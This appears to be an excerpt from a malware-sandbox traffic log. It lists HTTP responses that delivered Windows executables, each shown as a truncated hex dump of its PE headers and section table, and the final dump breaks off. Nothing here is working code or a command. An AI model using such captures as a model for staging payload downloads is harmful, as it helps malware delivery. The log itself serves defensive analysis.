                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 23 Apr 2024 07:43:15 GMTContent-Type: application/x-msdos-programContent-Length: 1106998Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 23 Apr 2024 07:43:16 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Fri, 15 Mar 2024 11:59:56 GMTETag: "4a4030-613b1bf118700"Accept-Ranges: bytesContent-Length: 4866096Content-Type: application/x-msdos-programData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 0a 00 84 e1 90 58 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 c4 35 00 00 50 14 00 00 00 00 00 60 d5 35 00 00 10 00 00 00 e0 35 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 d0 4a 00 00 04 00 00 60 c3 4a 00 02 00 00 00 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 b0 37 00 9c 4e 00 00 00 d0 3c 00 eb fe 0d 00 00 00 00 00 00 00 00 00 00 18 4a 00 30 28 00 00 00 30 38 00 84 9a 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 38 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 be 37 00 e0 0b 00 00 00 00 38 00 d2 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 68 85 35 00 00 10 00 00 00 86 35 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 69 74 65 78 74 00 00 3c 3d 00 00 00 a0 35 00 00 3e 00 00 00 8a 35 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 b0 56 01 00 00 e0 35 00 00 58 01 00 00 c8 35 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 8c 6d 00 00 00 40 37 00 00 00 00 00 00 20 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 9c 4e 00 00 00 b0 37 00 00 50 00 00 00 20 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 61 00 d2 09 00 00 00 00 38 00 00 0a 00 00 00 70 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 40 00 00 00 00 10 38 00 00 00 00 00 00 7a 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 20 38 00 00 02 00 00 00 7a 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 84 9a 04 00 00 30 38 00 00 9c 04 00 00 7c 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 73 72 63 00 00 00 eb fe 0d 00 00 d0 3c 00 00 00 0e 00 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 23 Apr 2024 07:43:20 GMTContent-Type: application/x-msdos-programContent-Length: 685392Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 23 Apr 2024 07:43:21 GMTContent-Type: application/x-msdos-programContent-Length: 608080Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 23 Apr 2024 07:43:22 GMTContent-Type: application/x-msdos-programContent-Length: 450024Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 23 Apr 2024 07:43:25 GMTContent-Type: application/x-msdos-programContent-Length: 2046288Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 23 Apr 2024 07:43:27 GMTContent-Type: application/x-msdos-programContent-Length: 257872Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 23 Apr 2024 07:43:27 GMTContent-Type: application/x-msdos-programContent-Length: 80880Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 